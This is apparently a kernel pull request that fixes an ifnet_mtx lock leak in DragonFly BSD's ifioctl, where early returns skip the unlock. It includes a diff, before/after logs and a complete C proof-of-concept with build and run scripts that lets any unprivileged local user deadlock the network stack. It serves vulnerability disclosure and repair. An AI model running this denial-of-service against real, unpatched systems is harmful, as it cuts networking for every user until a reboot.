### PR TITLE
if: ifnet_mtx deadlock from return-instead-of-break in ifioctl

### DIFF
--- a/sys/net/if.c
+++ b/sys/net/if.c
@@ -2109,7 +2109,7 @@ ifioctl(struct socket *so, u_long cmd, caddr_t data, struct ucred *cred)
 		 * terminating nul in.
 		 */
 		if (ifr->ifr_buffer.length > ifdescr_maxlen)
-			return (ENAMETOOLONG);
+			break;
 		else if (ifr->ifr_buffer.length == 0)
 			descrbuf = NULL;
 		else {
@@ -2386,24 +2386,24 @@ ifioctl(struct socket *so, u_long cmd, caddr_t data, struct ucred *cred)
 		ifgr = (struct ifgroupreq *)ifr;
 		error = caps_priv_check(cred, SYSCAP_NONET_IFCONFIG);
 		if (error)
-			return (error);
+			break;
 		if ((error = if_addgroup(ifp, ifgr->ifgr_group)))
-			return (error);
+			break;
 		break;
 
 	case SIOCDIFGROUP:
 		ifgr = (struct ifgroupreq *)ifr;
 		error = caps_priv_check(cred, SYSCAP_NONET_IFCONFIG);
 		if (error)
-			return (error);
+			break;
 		if ((error = if_delgroup(ifp, ifgr->ifgr_group)))
-			return (error);
+			break;
 		break;
 
 	case SIOCGIFGROUP:
 		ifgr = (struct ifgroupreq *)ifr;
 		if ((error = if_getgroups(ifgr, ifp)))
-			return (error);
+			break;
 		break;
 
 	default:


### PR DESCRIPTION
# if: ifnet_mtx deadlock from return-instead-of-break in ifioctl

Several error paths in `ifioctl()`'s ioctl switch in `sys/net/if.c` return directly instead of breaking out of the switch: `SIOCGIFGROUP` (`if ((error = if_getgroups(...))) return (error);`), `SIOCAIFGROUP`/`SIOCDIFGROUP` (the `caps_priv_check` and `if_addgroup`/`if_delgroup` error returns), and `SIOCSIFDESCR` (`return (ENAMETOOLONG)`). The switch runs under `ifnet_mtx` (taken at line 2029, released at line 2450), so each of those returns bypasses `ifnet_unlock()` and leaks `ifnet_mtx` permanently; every subsequent `ifnet_lock()` caller then blocks forever in uninterruptible sleep, deadlocking the whole network subsystem with no panic and no kernel message. `SIOCGIFGROUP` has no capability check, so any local user with a UDP socket can trigger it: send `SIOCGIFGROUP` with `ifgr_len` not equal to the real per-interface group count, `if_getgroups()` returns `EINVAL`, the handler returns, and the lock is gone.

## Fix

Replace the `return (...)` on these error paths with `break`, so control reaches `ifnet_unlock()` at the end of the function. The headline case is `SIOCGIFGROUP` (unprivileged, no caps check); the sibling paths are the same bug class under `SYSCAP_NONET_IFCONFIG` (`SIOCAIFGROUP`/`SIOCDIFGROUP`) and `SYSCAP_RESTRICTEDROOT` (`SIOCSIFDESCR`).

## Before / after

`#0 unpatched` (DragonFly 6.5-DEVELOPMENT), an unprivileged user issues one `SIOCGIFGROUP` with a wrong length, then a second operation from a fresh session:

```
[+] trigger ioctl (len=33) rc=-1 errno=22 (Invalid argument)
[!] child PID 942 still alive after 6 s -> DEADLOCK CONFIRMED
# separate fresh ssh:
$ ifconfig lo0        (no output; blocked forever in D-state on ifnet_lock)
```

Entire network subsystem dead; reboot-only recovery. No panic, no kernel message.

`#1 patched` (same kernel + this fix), same trigger repeated 3 times, then network ops from a fresh session:

```
[+] trigger ioctl (len=33) rc=-1 errno=22 (Invalid argument)
[*] child exited normally (code=1) -> second ioctl returned, NO deadlock
RESULT: NO_DEADLOCK
# separate fresh ssh after 3 PoC runs:
IFCONFIG_DONE rc=0    (returned immediately)
ROUTE_DONE rc=0
```

## Reproducer

Any local user with a UDP socket. `poc.c`:

```c
/*
 * SIOCGIFGROUP ifnet_mtx leak PoC (unprivileged DoS).
 *
 * Triggers the missing-ifnet_unlock-on-error-path bug in ifioctl()'s
 * SIOCGIFGROUP handler (sys/net/if.c).
 *
 * ifnet_lock() is taken before the switch; the SIOCGIFGROUP case does
 * `return (error)` from if_getgroups() instead of `break`, bypassing
 * ifnet_unlock() at the end of the function. Once leaked, the global
 * ifnet_mtx is held forever by the calling thread; every subsequent
 * ifnet_lock() attempt by any thread blocks forever -> system-wide
 * network DoS.
 *
 * Privilege model: SIOCGIFGROUP has NO caps_priv_check (unlike
 * SIOCAIFGROUP/SIOCDIFGROUP which need SYSCAP_NONET_IFCONFIG, and
 * SIOCSIFDESCR which needs SYSCAP_RESTRICTEDROOT). So ANY local user
 * with a UDP socket can trigger the leak.
 *
 * Trigger condition: if_getgroups() returns EINVAL when ifgr_len is
 * non-zero and != the real per-iface group count. We probe with len=0
 * to learn the real count, then send len=count+1 to force EINVAL ->
 * ifnet_mtx leaked.
 *
 * After the leak, a second network operation that needs ifnet_lock()
 * blocks forever. We fork a child, give it SIGALRM after a few seconds
 * to prove it actually blocked (vs. returning quickly), then report.
 */
#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <net/if.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

static const char *IFNAME = "lo0";

static int
do_getgroups(int s, u_int len, u_int *out_len)
{
	struct ifgroupreq ifgr;
	memset(&ifgr, 0, sizeof(ifgr));
	strlcpy(ifgr.ifgr_name, IFNAME, IFNAMSIZ);
	ifgr.ifgr_len = len;
	int rc = ioctl(s, SIOCGIFGROUP, &ifgr);
	if (rc == 0 && out_len)
		*out_len = ifgr.ifgr_len;
	return rc;
}

static volatile sig_atomic_t alarm_fired = 0;
static void on_alrm(int sig) { (void)sig; alarm_fired = 1; }

int
main(void)
{
	int s, rc;
	u_int real_len = 0;

	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { perror("socket"); return 2; }

	/* Step 1: probe real group length (len=0 path returns 0 and fills len). */
	rc = do_getgroups(s, 0, &real_len);
	if (rc < 0) {
		fprintf(stderr, "[!] probe ioctl failed: %s (errno=%d)\n",
		        strerror(errno), errno);
		fprintf(stderr, "[!] trying len=1 blindly to force EINVAL\n");
		real_len = 0; /* unknown; len=1 almost certainly won't match */
	} else {
		fprintf(stderr, "[*] %s real group_len=%u\n", IFNAME, real_len);
	}

	/* Step 2: trigger the EINVAL path with a deliberately-wrong length.
	 * The handler does `return (error)` instead of `break`, leaking
	 * the global ifnet_mtx acquired before the switch. */
	u_int bad_len = (real_len == 0) ? 1 : real_len + 1;
	errno = 0;
	rc = do_getgroups(s, bad_len, NULL);
	fprintf(stderr,
	    "[+] trigger ioctl (len=%u) rc=%d errno=%d (%s)\n",
	    bad_len, rc, errno, rc ? strerror(errno) : "no error");
	if (rc == 0) {
		fprintf(stderr,
		    "[?] trigger did NOT error; group count changed? retrying with len=99\n");
		do_getgroups(s, 99, NULL);
	}
	close(s);

	/* Step 3: ifnet_mtx is now permanently held. Any subsequent call
	 * into ifioctl() that reaches ifnet_lock() blocks forever. We
	 * demonstrate this by forking a child that issues another
	 * SIOCGIFGROUP on a fresh socket; SIGALRM after 5 s kills it and
	 * we observe that it was still blocked (D-state). */
	fflush(stderr);
	pid_t pid = fork();
	if (pid < 0) { perror("fork"); return 2; }
	if (pid == 0) {
		/* child */
		struct sigaction sa;
		memset(&sa, 0, sizeof(sa));
		sa.sa_handler = on_alrm;
		sigaction(SIGALRM, &sa, NULL);
		alarm(5);
		int s2 = socket(AF_INET, SOCK_DGRAM, 0);
		if (s2 < 0) _exit(2);
		/* this should NEVER return on a vulnerable kernel */
		do_getgroups(s2, 0, NULL);
		close(s2);
		_exit(alarm_fired ? 0 : 1); /* 0 = alarm fired (was blocked) */
	}

	int status = 0;
	pid_t w;
	sleep(6);
	w = waitpid(pid, &status, WNOHANG);
	if (w == 0) {
		/* child still running - likely blocked in ioctl */
		fprintf(stderr,
		    "[!] child PID %d still alive after 6 s -> DEADLOCK CONFIRMED\n",
		    (int)pid);
		kill(pid, SIGKILL);
		waitpid(pid, &status, 0);
		printf("RESULT: DEADLOCK_CONFIRMED child_blocked_after_alarm\n");
		return 0;
	} else if (WIFEXITED(status)) {
		int code = WEXITSTATUS(status);
		if (code == 0) {
			/* alarm fired before ioctl returned => blocked */
			printf("RESULT: DEADLOCK_CONFIRMED alarm_fired_during_ioctl\n");
			return 0;
		}
		fprintf(stderr,
		    "[*] child exited normally (code=%d) -> second ioctl returned, NO deadlock\n",
		    code);
		printf("RESULT: NO_DEADLOCK\n");
		return 1;
	}
	fprintf(stderr, "[?] child status=0x%x\n", status);
	printf("RESULT: INCONCLUSIVE\n");
	return 2;
}
```

`build.sh`:

```sh
#!/bin/sh
# PoC build. No external deps; just cc.
set -e
cd "$(dirname "$0")"
cc -O2 -Wall -o poc poc.c
echo "BUILD_EXIT=$?"
ls -l poc
```

`run.sh`:

```sh
#!/bin/sh
# Runs as any unprivileged user. Prints "RESULT: DEADLOCK_CONFIRMED ..." if
# ifnet_mtx is leaked and the second network ioctl blocks forever;
# "RESULT: NO_DEADLOCK" otherwise.
cd "$(dirname "$0")"
./poc
echo "RUN_EXIT=$?"
```

Build and run:

```
sh ./build.sh
./poc            # as any local user: DEADLOCK_CONFIRMED on unpatched, NO_DEADLOCK on patched
```
